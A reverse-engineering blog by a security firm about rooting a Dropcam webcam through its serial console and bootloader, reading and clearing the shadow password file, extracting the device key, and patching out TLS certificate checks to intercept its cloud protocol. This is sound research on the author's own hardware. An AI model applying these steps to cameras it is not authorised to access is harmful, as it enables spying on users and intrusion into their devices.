Thursday, April 3, 2014

Reversing the Dropcam Part 2: Rooting your Dropcam

by Kris Brosch

In the last Dropcam post, I wrote about reversing the USB setup procedure that the Dropcam uses to initially connect to your WiFi network. After exploring the USB tunneling protocol, the next step was to take it apart, or at least take off the back of the enclosure:


The main controller is an Ambarella A5s system-on-chip, which contains an ARM processor, video processing hardware, USB device controller, and other peripherals. We had actually already guessed that the Dropcam used an Amborella chip based on the iManufacturer USB descriptor field value “Linux 2.6.38.8 with ambarella_udc”. Ambarella chips are also used in GoPro cameras. Quite a bit of work has been done reversing GoPro cameras by other researchers. One researcher, who goes by evilwombat, has done some particularly interesting work, including writing a firmware parser and tools that can be used to load custom code onto GoPro cameras over the USB port, which can be found at his Github page (https://github.com/evilwombat?tab=repositories).

Here's a picture of the Dropcam with some of the components identified:


The most useful thing to identify was the UART (serial) port (zoomed in the picture above, and labeled with TX, RX, 3.3v, and GND). Upon examining the board, that 4-pin footprint looked suspiciously like a serial port. One pad was connected to ground, and another was connected to a thick trace meaning it was likely a power connection, and it is in fact at 3.3v when the camera is powered on. The other two pads were connected to resistors via small traces and they were both at 3.3v with the camera powered on. This is consistent with an embedded system serial port – UARTs usually are at a “high” voltage level when they are idle; the TX line would be high because no data was being transmitted and the RX line would be pulled high when no input is connected. I tried connecting the RX line of a serial adapter to each of the two pads and found that when I configured the adapter for a baudrate of 115200 and powered the Dropcam, I could see Linux boot messages being transmitted:
[    0.000000] Linux version 2.6.38.8 (dropcambuild@ubuntu-dropcam-build) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) ) #15 PREEMPT Mon Oct 1 16:59:51 PDT 2012
[    0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f
[    0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
[    0.000000] Machine: Coconut
[    0.000000] Memory policy: ECC disabled, Data cache writeback
[    0.000000] Ambarella: AHB   = 0x60000000[0xf0000000],0x01000000 0
[    0.000000] Ambarella: APB   = 0x70000000[0xf1000000],0x01000000 0
[    0.000000] Ambarella: PPM   = 0xc0000000[0xe0000000],0x00200000 9
[    0.000000] Ambarella: BSB   = 0xc8c00000[0xe8c00000],0x00400000 9
[    0.000000] Ambarella: DSP   = 0xc9000000[0xe9000000],0x07000000 9
[    0.000000] Ambarella: HAL   = 0xc00a0000[0xfee00000],0x00009f34 9
[    0.000000] bootmem_init: high_memory = 0xc8a00000
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 35052
[    0.000000] Kernel command line: console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc
[    0.000000] PID hash table entries: 1024 (order: 0, 4096 bytes)
[    0.000000] Dentry cache hash table entries: 32768 (order: 5, 131072 bytes)
[    0.000000] Inode-cache hash table entries: 16384 (order: 4, 65536 bytes)
[    0.000000] Memory: 138MB = 138MB total
[    0.000000] Memory: 136244k/136244k available, 5068k reserved, 0K highmem
(etc.)

Once I had identified the TX and RX pads and successfully received some data, I soldered some wires to those pads and brought them out of the case so that I could access the serial port with the Dropcam assembled:
After the boot messages, there is eventually a login prompt:
########  ########   #######  ########   ######     ###    ##     ##
##     ## ##     ## ##     ## ##     ## ##    ##   ## ##   ###   ###
##     ## ##     ## ##     ## ##     ## ##        ##   ##  #### ####
##     ## ########  ##     ## ########  ##       ##     ## ## ### ##
##     ## ##   ##   ##     ## ##        ##       ######### ##     ##
##     ## ##    ##  ##     ## ##        ##    ## ##     ## ##     ##
########  ##     ##  #######  ##         ######  ##     ## ##     ##

Ambarella login:

Getting root via the Ambarella bootloader 

Unfortunately, I didn't know the root password. I tried logging in as root with a few guessed passwords, but none of them worked. I was considering different ways to dump or modify the Flash chip contents when I happened upon a solution on a forum. After reading some posts on one of the GoPro forums I tried a trick mentioned there to get a bootloader prompt – transmitting a newline immediately upon powering the device on is the key. If you hold down the “Enter” key, repeatedly sending newlines to the serial connection while powering the Dropcam, you can access to the Ambarella bootloader:
             ___  ___  _________                _
            / _ \ |  \/  || ___ \              | |
           / /_\ \| .  . || |_/ /  ___    ___  | |_
           |  _  || |\/| || ___ \ / _ \  / _ \ | __|
           | | | || |  | || |_/ /| (_) || (_) || |_
           \_| |_/\_|  |_/\____/  \___/  \___/  \__|
----------------------------------------------------------
Amboot(R) Ambarella(R) Copyright (C) 2004-2007
BST (137166), HAL (137166)
Arm freq: 480000000
iDSP freq: 120000000
Core freq: 120000000
Dram freq: 336000000
AHB freq: 120000000
APB freq: 60000000
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot> help
The following commands are supported:
help    bios    boot    diag
dump    erase   nand_erase      exec
hal     hotboot netboot ping
r8      r16     r32     reboot
reset   setenv  setmem  show
usbdl   w8      w16     w32
xmdl    bapi
Use 'help' to get help on a specific command
amboot>
Once you have access to the bootloader, rooting the Dropcam is just like getting root on any Linux computer where you have access to the bootloader. You can copy the kernel command line shown in the boot messages:
console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc
And change the init parameter to start a shell:
amboot> boot console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh
After doing this and watching the kernel boot again, I was left with a root shell:
[    3.130000] UBIFS: reserved for root:  0 bytes (0 KiB)
[    3.130000] VFS: Mounted root (ubifs filesystem) on device 0:13.
[    3.140000] Freeing init memory: 136K
/bin/sh: can't access tty; job control turned off
/ #
My goal was to edit the /etc/shadow file so that I could log in to the camera after a normal boot. Interestingly, the /etc/shadow file on the Dropcam is a link to /mnt/dropcam/shadow:
/ # ls -l /etc/shadow
lrwxrwxrwx    1 root     root           21 Oct  1  2012 /etc/shadow -> ../mnt/dropcam/shadow
You therefore need to mount the /mnt/dropcam filesystem to access the shadow file:
/ # cat /etc/fstab
# /etc/fstab: static file system information.
#
# <file system> <mount pt>     <type>   <options>         <dump> <pass>
#/dev/root       /              ext2    rw,noauto         0      1
#proc           /proc          proc     defaults          0      0
devpts          /dev/pts       devpts   defaults,gid=5,mode=620   0      0
#tmpfs           /tmp           tmpfs    defaults          0      0
sysfs           /sys           sysfs    defaults          0      0
debugfs         /debug         debugfs    defaults        0      0

# extra mounts
/dev/mtdblock9 /mnt/dropcam jffs2 defaults 0 0
/ # mount -tjffs2 /dev/mtdblock9 /mnt/dropcam
And then remove the password hashes from it:
/ # cat /mnt/dropcam/shadow
root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
default::10933:0:99999:7:::
The /mnt/dropcam filesystem is interesting because it appears to be where camera-specific configuration files are stored:
/ # ls /mnt/dropcam/
bpcmap.bin           keycert.pem          softmac
fv.txt               provisioned          wpa_supplicant.conf
hwver                shadow
This implies that different cameras might have different root passwords. The wpa_supplicant.conf file contains the configuration for the wireless network. Most interesting of these files, however, is the keycert.pem file, which contains a public/private RSA key pair and a client certificate. The certificate is issued by a “Dropcam Certificate Authority”, and the common name is set to the unique ID of my Dropcam (the same identifier used to set up the camera and view its stream, as discussed in my previous post):
$ openssl x509 -in keycert.pem -noout -text | grep CN
        Issuer: C=US, CN=Dropcam Certificate Authority, O=Dropcam
        Subject: C=US, CN=d024378182da4f37b0e981946989f40a, O=Dropcam
This means that each Dropcam has a unique client certificate that it uses to authenticate to the Dropcam cloud servers.

Exploring the running device

Now that I had modified the shadow file, I was able to log in as root without a password and inspect the system after it had booted normally:
# ps
PID   USER     TIME   COMMAND
    1 root       0:02 init
    2 root       0:00 [kthreadd]
    3 root       0:00 [ksoftirqd/0]
    4 root       0:00 [kworker/0:0]
    5 root       0:00 [kworker/u:0]
    6 root       0:00 [khelper]
    7 root       0:00 [kworker/u:1]
  402 root       0:00 [sync_supers]
  404 root       0:00 [bdi-default]
  406 root       0:00 [kblockd]
  513 root       0:00 [kswapd0]
  514 root       0:00 [fsnotify_mark]
  515 root       0:00 [aio]
  517 root       0:00 [crypto]
  558 root       0:00 [mtdblock0]
  563 root       0:00 [mtdblock1]
  568 root       0:00 [mtdblock2]
  573 root       0:00 [mtdblock3]
  578 root       0:00 [mtdblock4]
  583 root       0:00 [mtdblock5]
  588 root       0:00 [mtdblock6]
  593 root       0:00 [mtdblock7]
  598 root       0:00 [mtdblock8]
  603 root       0:00 [mtdblock9]
  611 root       0:00 [ubi_bgt0d]
  628 root       0:00 [ubifs_bgt0_0]
  629 root       0:00 [kworker/0:1]
  643 root       0:00 [flush-ubifs_0_0]
  646 root       0:00 [jffs2_gcd_mtd9]
  699 root       0:00 [kworker/u:2]
  735 root       0:00 /bin/ash /usr/bin/bootstrap.sh
  736 root       0:00 -sh
  738 root       0:00 syslogd -C128 -S
  740 root       0:00 klogd
  743 root       0:00 /usr/bin/connect
  744 root       0:00 logger -t connect
  745 root       0:00 /usr/bin/connect
  746 root       0:00 /usr/bin/connect
  760 root       0:00 [file-storage]
  772 root       0:00 [kworker/0:2]
  784 root       0:00 [cfg80211]
  804 root       0:00 [AR6K Async]
  811 root       0:00 [ksdioirqd/mmc1]
  822 root       0:00 wpa_supplicant -iwlan0 -c/mnt/dropcam/wpa_supplicant.conf
  829 root       0:00 [dsplogd]
  830 root       0:00 [vsyncd]
  860 root       0:00 [sh]
  861 root       0:00 [sh]
  868 root       0:00 ps
The /usr/bin/connect binary performs most of the operations of the Dropcam. It handles the TLS connections made out to Dropcam cloud servers (which, based on strings in the connect binary, carry a protocol named droptalk). It also handles loading and unloading the kernel driver, as well as the userspace portions of the USB mass storage network tunnel (which again, based on strings in the binary, is named FSNL). The connect binary is UPX packed, but it can be unpacked easily:
$ strings connect | tail -1
UPX!
$ upx -d connect
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    789596 <-    420052   53.20%   linux/armel   connect

Unpacked 1 file.
One thing that we noticed when looking at this binary was that it contains references to the Lua scripting language. We weren't sure why until we saw that it was writing to a file named /tmp/connect.bin and then running this command via a call to system():
rm -rf /tmp/connect && mkdir /tmp/connect && tar zx -f /tmp/connect.bin -C /tmp/connect && rm /tmp/connect.bin
The connect binary itself contains an embedded tarball that gets extracted to /tmp/connect when it runs. The tarball contains an assortment of files including a number of compiled Lua scripts:
$ dd if=./connect of=connect.tar.gz bs=1 skip=473404 count=168451
168451+0 records in
168451+0 records out
168451 bytes (168 kB) copied, 0.364475 s, 462 kB/s
$ tar -tzvf connect.tar.gz
-rw-r--r-- dropcambuild/dropcambuild 10376 2013-04-22 20:25 dispatch.bin
-rw-r--r-- dropcambuild/dropcambuild  1243 2013-04-22 20:25 hello.bin
-rw-r--r-- dropcambuild/dropcambuild   545 2013-04-22 20:25 hwver.bin
-rw-r--r-- dropcambuild/dropcambuild  4279 2013-04-22 20:25 ir.bin
-rw-r--r-- dropcambuild/dropcambuild   879 2013-04-22 20:25 list.bin
-rw-r--r-- dropcambuild/dropcambuild   650 2013-04-22 20:25 main.bin
-rw-r--r-- dropcambuild/dropcambuild  2363 2013-04-22 20:25 monitor.bin
-rw-r--r-- dropcambuild/dropcambuild   708 2013-04-22 20:25 motion.bin
-rw-r--r-- dropcambuild/dropcambuild  2010 2013-04-22 20:25 net.bin
-rw-r--r-- dropcambuild/dropcambuild  2607 2013-04-22 20:25 oldiags.bin
-rw-r--r-- dropcambuild/dropcambuild  3280 2013-04-22 20:25 persistence.bin
-rw-r--r-- dropcambuild/dropcambuild   329 2013-04-22 20:25 platform.bin
-rw-r--r-- dropcambuild/dropcambuild  3365 2013-04-22 20:25 platform_a5s.bin
-rw-r--r-- dropcambuild/dropcambuild   551 2013-04-22 20:25 platform_local.bin
-rw-r--r-- dropcambuild/dropcambuild   822 2013-04-22 20:25 ravg.bin
-rw-r--r-- dropcambuild/dropcambuild   191 2013-04-22 20:25 rtp.bin
-rw-r--r-- dropcambuild/dropcambuild   643 2013-04-22 20:25 settings.bin
-rw-r--r-- dropcambuild/dropcambuild  9931 2013-04-22 20:25 states.bin
-rw-r--r-- dropcambuild/dropcambuild   912 2013-04-22 20:25 status.bin
-rw-r--r-- dropcambuild/dropcambuild  3822 2013-04-22 20:25 streams.bin
-rw-r--r-- dropcambuild/dropcambuild  3047 2013-04-22 20:25 update.bin
-rw-r--r-- dropcambuild/dropcambuild   601 2013-04-22 20:25 usb.bin
-rw-r--r-- dropcambuild/dropcambuild  2602 2013-04-22 20:25 util.bin
-rw-r--r-- dropcambuild/dropcambuild  1468 2013-04-22 20:25 watchdog.bin
-rw-r--r-- dropcambuild/dropcambuild 54727 2013-04-22 20:25 droptalk_pb.bin
-rw-r--r-- dropcambuild/dropcambuild  1504 2013-04-22 20:25 containers.bin
-rw-r--r-- dropcambuild/dropcambuild  5879 2013-04-22 20:25 decoder.bin
-rw-r--r-- dropcambuild/dropcambuild  1038 2013-04-22 20:25 descriptor.bin
-rw-r--r-- dropcambuild/dropcambuild  9360 2013-04-22 20:25 encoder.bin
-rw-r--r-- dropcambuild/dropcambuild   615 2013-04-22 20:25 listener.bin
-rw-r--r-- dropcambuild/dropcambuild 20750 2013-04-22 20:25 protobuf.bin
-rw-r--r-- dropcambuild/dropcambuild  1505 2013-04-22 20:25 text_format.bin
-rw-r--r-- dropcambuild/dropcambuild  1525 2013-04-22 20:25 type_checkers.bin
-rw-r--r-- dropcambuild/dropcambuild  3620 2013-04-22 20:25 wire_format.bin
-rw-r--r-- dropcambuild/dropcambuild  1686 2013-04-22 17:24 a5s_boot.sh
-rw-r--r-- dropcambuild/dropcambuild    78 2013-04-18 16:45 wpa_supplicant_a5s.conf
-rwxr-xr-x dropcambuild/dropcambuild  1286 2013-04-18 16:45 udhcpc.script
-rwxr-xr-x dropcambuild/dropcambuild  1310 2013-04-18 16:45 udhcpc_provision.script
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_01_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_01_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_02_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_02_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_03_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_03_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_04_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_04_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 27453 2013-04-18 16:45 ambarella_udc-pre-v16.ko
-rwxr-xr-x dropcambuild/dropcambuild 86828 2013-04-18 16:45 wmiconfig
We'll have another blog post coming up detailing how to reverse engineer those compiled Lua scripts, with a tool to make the RE work easier.

Transport encryption and exploring traffic interception


I wanted to perform a man-in-the-middle attack so that I could decode the TLS traffic from the camera. Every Dropcam has its own client certificate issued by the Dropcam CA; with a copy of my camera's client certificate I could start a TLS connection to the Dropcam servers, but I couldn't yet convince the connect binary to connect to me. In order to perform the man-in-the-middle attack, the simplest option was to patch the server certificate checking code out of the connect binary. This involved flipping one bit in the unpacked binary, re-packing it, and uploading it to the camera.

The droptalk transport layer has decent protection against eavesdropping attacks. It uses an OpenSSL TLSv1 connection with ephemeral elliptic curve Diffie-Hellman (ECDHE) key exchange, and either 128 or 256 bit AES encryption. This is the list of the two cipher suites that the connect binary will accept for the droptalk connection:
ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA
The ECDHE key exchange method made performing a man-in-the-middle on the droptalk connection harder because most tools that I tried to use didn't support that key exchange algorithm. However, I was able to hack some code together that given the camera's private key and certificate would let me intercept and examine the draptalk traffic between my patched connect binary and the Dropcam servers. Here's a picture of my test setup:
My Linux machine was configured to act as a wireless access point, using iptables to redirect the dropcam traffic to my listening droptalk interception process. In addition, I had a serial terminal connected to the Dropcam's serial port so I could upload the patched connect binary and examine its behavior. The droptalk protocol is simple – there is a 3-byte header consisting of a one-byte message type followed by a big-endian two-byte length field. Luckily, there is a function in the connect binary for converting droptalk message type identifiers (the first byte in the header) to human-readalble strings for inclusion in debug output:
The function provides us with this list of droptalk message types:
00      RESERVED
01      REDIRECT
02      START_STREAM
03      STOP_STREAM
04      WIFI_SCAN
05      WIFI_CONNECT
06      RESTART
07      UPDATE
08      DEBUG
09      SET_STATUS_LIGHT
0a      SET_ILLUMINATOR_LIGHT
0b      SET_AUDIO_GAIN
0c      STOP_BACKFILL
0d      AUDIO_PAYLOAD
0e      SET_IR_LED
0f      SET_DPTZ
10      FORCE_IDR
11      EXEC
12      SET_WATERMARK
13      AUDIO_SOUND
14      SET_IMAGE_PROPERTIES
40      PING
80      HELLO
81      STREAM_BEGIN
82      STREAM_END
83      RTP
84      WIFI_SCAN_LIST
85      WIFI_CONNECT_STATUS
86      EVENT
87      BACKFILL_COMPLETE
8a      UPDATE_RESULT
8c      OFFLINE_DIAGNOSTIC_REPORT
8e      STATUS_REPORT
Message types 0x01 through 0x14 appear to be messages that are sent to the camera, while types 0x80 through 0x8e appear to be intended to originate from the camera. Most of the droptalk messages contain protobufs which are decoded in the Lua code. For example, here's the first HELLO packet that my Dropcam sends when it connects to nexus.dropcam.com, decoded with the protoc tool:
7: "Dropcam Connect - Version: 162, Build: 57 (jenkins-connect-release-node=linux-57, a29560dbb0724e7dbafb19b9ac1268b6fb62f1d6, origin/hotfix/basil)"
9: 2
8: "Build: 181 (jenkins-ambarella-181, 8732f64a79aecdd16bf6562775015c303d71c839), Linux: Linux Ambarella 2.6.38.8 #15 PREEMPT Mon Oct 1 16:59:51 PDT 2012 armv6l GNU/Linux"
1: 1
5: 3
6: 15
4: "0.0.0.0"
2: 4
3: 162
The nexus.dropcam.com server always replies with a REDIRECT to an “oculus” server:
1: "oculus121.dropcam.com"
The client then connects to the “oculus” server and sends another HELLO packet. Most of the configuration options in the Dropcam web interface correspond to droptalk messages that are sent to the camera. When the server is ready to receive data, it sends a START_STREAM message with some video parameters in it. Video data is sent from the camera in RTP droptalk messages containing RTP formatted video data.

Conclusions

In this post I've written about the process of reverse engineering the Dropcam from the point of opening the case to having a basic understanding of its network protocols. With the information we've gathered, you could start to piece together a protobuf definition file (.proto file) for the various message types and write your own droptalk client or server. Alternatively, you could use the root shell on the Dropcam to modify or add to its functionality. Comment below, email us, or tweet @IncludeSecurity if you try these things, we'd love to hear what modifications you make to your Dropcam.

Stay tuned for the final blog post in this series regarding Lua scripts!

Thursday, March 27, 2014

Reversing the Dropcam Part 1: Wireless and network communications

by Kris Brosch

The "Internet of Things" marketplace has been blowing up recently, and towards the end of last year we began seeing a lot of demand for security assessments of these types of platforms. To practice, we wanted to reverse engineer a consumer platform from scratch and look around for security vulnerabilities. What follows is the first of a three-part series on what we were able to do with the Dropcam. Through this research, we found the Dropcam has a pretty solid security model, so no 0day in this post. That being said, this type of reversing work is the most important prerequisite for finding security vulnerabilities, so we thought it would be great to share our findings and techniques with the security and reverse engineering communities. Hope you enjoy, and leave a comment if you have any further ideas to extend what we're showing here.

For those that don't know, the Dropcam is a cloud-based webcam. It connects to the internet over WiFi, and users interact through it entirely via the dropcam.com web interface, or through a mobile app. We purchased some Dropcam cameras to find out more about how it works. In this series, you'll get an idea of how the process of reversing a device like the Dropcam works including the tools we use and how we use them. This project ultimately ends up going into hardware hacking, but as you'll see below, you can often gather a lot of information about how a device works before you open the case. Everything in this first post was done without taking the Dropcam apart, while our next posts will discuss taking it apart and some hardware hacking basics.

Getting the Dropcam connected to the WiFi

As I was opening the Dropcam box, one of the first questions I asked was: how does it set up its WiFi connection? It's supposed to connect to your WiFi and present a configuration interface through dropcam.com, but it must have to learn at least your WiFi SSID first to do that. The documentation tells you to plug the USB cable into your computer and run through setup.

When you plug your Dropcam's USB cable into your computer, the camera enumerates as a USB mass storage device with a few files on it, including setup binaries for both MacOS and Windows:
$ find .
.
./.dcdata
./.dcdata/volume.ico
./.dcdata/offset
./Setup Dropcam (Macintosh).app
./Setup Dropcam (Macintosh).app/Contents
./Setup Dropcam (Macintosh).app/Contents/Resources
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj/InfoPlist.strings
./Setup Dropcam (Macintosh).app/Contents/Resources/OSXSetup.icns
./Setup Dropcam (Macintosh).app/Contents/Info.plist
./Setup Dropcam (Macintosh).app/Contents/PkgInfo
./Setup Dropcam (Macintosh).app/Contents/MacOS
./Setup Dropcam (Macintosh).app/Contents/MacOS/Setup Dropcam (Macintosh)
./Setup Dropcam (Macintosh).app/winicon.ico
./Setup Dropcam (Macintosh).app/desktop.ini
./Setup Dropcam (Windows).exe
./._Setup Dropcam (Windows).exe
./.VolumeIcon.icns
./._.VolumeIcon.icns
./._?
./autorun.inf
./.hidden

Here are a few lines from the output of lsusb on the host computer:
ID 0525:a4a5 Netchip Technology, Inc. Linux-USB File Storage Gadget
...
  idVendor           0x0525 Netchip Technology, Inc.
  idProduct          0xa4a5 Linux-USB File Storage Gadget
...
  iManufacturer           2 Linux 2.6.38.8 with ambarella_udc
  iProduct                3 Dropcam Setup
...

When I ran the setup binary, it opened a web browser to
https://www.dropcam.com/setup/d024378182da4f37b0e981946989f40a?cv=140&fv=15&hv=3&platform=windows
The 32-character string in the URL is the unique identifier of my Dropcam. As you go through the web interface to set up the Dropcam, your browser eventually gets sent a JSON blob from a Dropcam web server containing a list of network SSIDs, BSSIDs, and other details of wireless networks near the camera. This data is presented in a list so that the user can pick which access point they want their camera to connect to.

How does the server get the list of WiFi networks? It must be communicating with the Dropcam, but at first it's not clear how. When the device is plugged in to a USB port, the Dropcam appears only as a mass storage device so somehow a mass storage device is talking to the Internet through my computer?

To investigate further, I set up the testing environment depicted here:



The executable ran in a Windows virtual machine with Process Monitor from the Sysinternals Suite inspecting its behavior, while I captured USB traffic and network traffic from the setup executable using two instances of Wireshark on my Linux host machine. The setup executable also started the Chrome browser in the Windows VM, which I configured to use Burp suite as a proxy.

Process Monitor gave me an initial idea of what was going on:


The setup binary is first reading the .dcdata/offset file (1), then doing reads and writes directly to the "disk" (2). The .dcdata/offset file is simply a text file with a number in it:
$ cat .dcdata/offset
1312768

You can see that 1312768 is the byte-offset into the "disk" where the setup executable is reading and writing (3). Wireshark lets us see the actual data that is being transferred back and forth. Here's a screenshot of part of the USB capture:


You can see that a SCSI Write command is being made to logical block address 0xa04, with length 4 (1). 0xa04 is 2564, which multiplied by the 512-byte block size is byte 1312768. The length 4 multiplied by 512 is 2048 bytes; this write corresponds to the highlighted WriteFile command in the Process Monitor screenshot. The data being written is shown in the hexdump (2) of the URB_BULK packet (3) following the SCSI Write command packet.

What's happening is that the setup binary is communicating with the Dropcam by reading and writing network packets from and to a "magic" address on the USB mass storage "disk". By looking at multiple packets being sent over this USB channel and reading the setup binary in IDA, I was able to get an idea of the protocol.


Above is a screenshot from the IDA Pro disassembly of the Macintosh setup binary (the Mac binary had more symbols and was easier to read than the Windows binary). The screenshot shows a portion of the code involved in decoding received packets. All the packets that I captured started with the magic big-endian number 0xd409ca11. I found this code by searching in IDA for that number. You can see that that number (1) is confirmed to be a magic number by an error message that is reached when the first 4 bytes are non-zero and don't equal 0xd409ca11 (2). In addition, bytes six and seven (3) appear to be a big-endian sequence number according to another error message (4), and bytes 8 and 9 (5) turn out to be a big-endian length field. Also, the remaining two bytes – 4 and 5 – appear to increment from -1 in packets with no payload from the setup binary to the Dropcam; it is presumed that these are acknowledgment packets.

Here are some packets, extracted from my USB Wireshark capture:

Init packet, setup -> dropcam:
d4 09 ca 11 ff ff 00 00 00 05 00 ff ff 00 00      ..............

Init response packet, dropcam -> setup:
d4 09 ca 11 00 00 00 00 01 25 00 ff ff 01 08 64   .........%.....d
30 32 34 33 37 38 31 38 32 64 61 34 66 33 37 62   024378182da4f37b
30 65 39 38 31 39 34 36 39 38 39 66 34 30 61 00   0e981946989f40a.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 8c 00 00 00 0f 02 00 01 00 13 01 bb 6e 65   ..............ne
78 75 73 2e 64 72 6f 70 63 61 6d 2e 63 6f 6d      xus.dropcam.com

Ack, setup -> dropcam
d4 09 ca 11 ff ff 00 01 00 00                     ..........

Data, dropcam -> setup
d4 09 ca 11 00 00 00 01 00 81 03 00 01 00 7c 16   ..............|.
03 01 00 77 01 00 00 73 03 01 4d e5 e3 9d c8 16   ...w...s..M.....
17 eb d7 4e 78 42 02 2e ef 7d 4b 14 d9 2b ad fe   ...NxB...}K..+..
f2 e4 84 68 49 1f 0f fc 00 ab 00 00 06 c0 13 c0   ...hI...........
14 00 ff 01 00 00 44 00 0b 00 04 03 00 01 02 00   ......D.........
0a 00 34 00 32 00 01 00 02 00 03 00 04 00 05 00   ..4.2...........
06 00 07 00 08 00 09 00 0a 00 0b 00 0c 00 0d 00   ................
0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00   ................
16 00 17 00 18 00 19 00 23 00 00                  ........#..    

Ack, setup -> dropcam
d4 09 ca 11 00 00 00 02 00 00                     ..........

Data, setup -> dropcam
d4 09 ca 11 00 01 00 03 06 1b 03 00 01 06 16 16   ................
03 01 06 11 02 00 00 4d 03 01 52 61 ba a6 7f 84   .......M..Ra....
26 84 98 0d ed 96 f2 07 e2 90 30 9c 6d 21 9d 4f   &.........0.m!.O
fa 80 8f 91 3f 75 ba bd 01 d6 20 52 61 ba a6 7b   ....?u.... Ra..{
f6 97 94 dc 02 28 3c 49 2c 2b c4 18 f8 8d df f3   .....(<I,+......
ac e9 de d3 06 fe bc ed 25 dd 7f c0 13 00 00 05   ........%.......
ff 01 00 01 00 0b 00 03 0b 00 03 08 00 03 05 30   ...............0
82 03 01 30 82 01 e9 02 05 00 ed f7 59 0d 30 0d   ...0........Y.0.
06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 47 31   ..*.H........0G1
0b 30 09 06 03 55 04 06 13 02 55 53 31 26 30 24   .0...U....US1&0$
06 03 55 04 03 13 1d 44 72 6f 70 63 61 6d 20 43   ..U....Dropcam C
65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f   ertificate Autho
72 69 74 79 31 10 30 0e 06 03 55 04 0a 13 07 44   rity1.0...U....D
72 6f 70 63 61 6d 30 22 18 0f 32 30 30 31 30 31   ropcam0"..200101
30 31 30 30 30 30 30 30 5a 18 0f 32 30 35 30 30   01000000Z..20500
31 30 31 30 30 30 30 30 30 5a 30 3e 31 0b 30 09   101000000Z0>1.0.
06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55   ..U....US1.0...U
04 03 13 14 6f 63 75 6c 75 73 37 34 2e 64 72 6f   ....oculus74.dro
70 63 61 6d 2e 63 6f 6d 31 10 30 0e 06 03 55 04   pcam.com1.0...U.
0a 13 07 44 72 6f 70 63 61 6d 30 82 01 22 30 0d   ...Dropcam0.."0.
(etc.)

The setup binary starts out by sending an initialization command to the Dropcam (command 00 ff ff 00 00). The Dropcam replies with a packet containing its UUID (so the setup binary knows where to point the web browser), and a host for the setup binary to initiate a TCP connection to (nexus.dropcam.com). After that, every packet contains a 5-byte sub-header (the first byte is 0x03, the last two bytes are a length field), followed by data. This same data was captured by my other Wireshark instance which was capturing a TCP connection made from the setup binary to nexus.dropcam.com via a TLSv1 connection. The Dropcam requests a TCP connection be made, and the setup binary tunnels all of that connection's traffic over the USB mass storage channel.

So this is how the Dropcam connects to the internet: it appears as a USB mass storage device containing a setup executable to the host computer; the setup binary then tunnels a connection from the Dropcam over the USB link by reading and writing at a particular offset into the raw "disk" and connecting out to the internet using the host computer's internet connection. Meanwhile, the user is presented with a list of WiFi networks that the cloud server obtained over the tunneled connection. The user picks their network in the web interface, and types in their WiFi password. The selected network and password are then sent in a POST request to the cloud server, which pushes the password down to the camera, again over the tunneled connection.

Considerations for WiFi password privacy

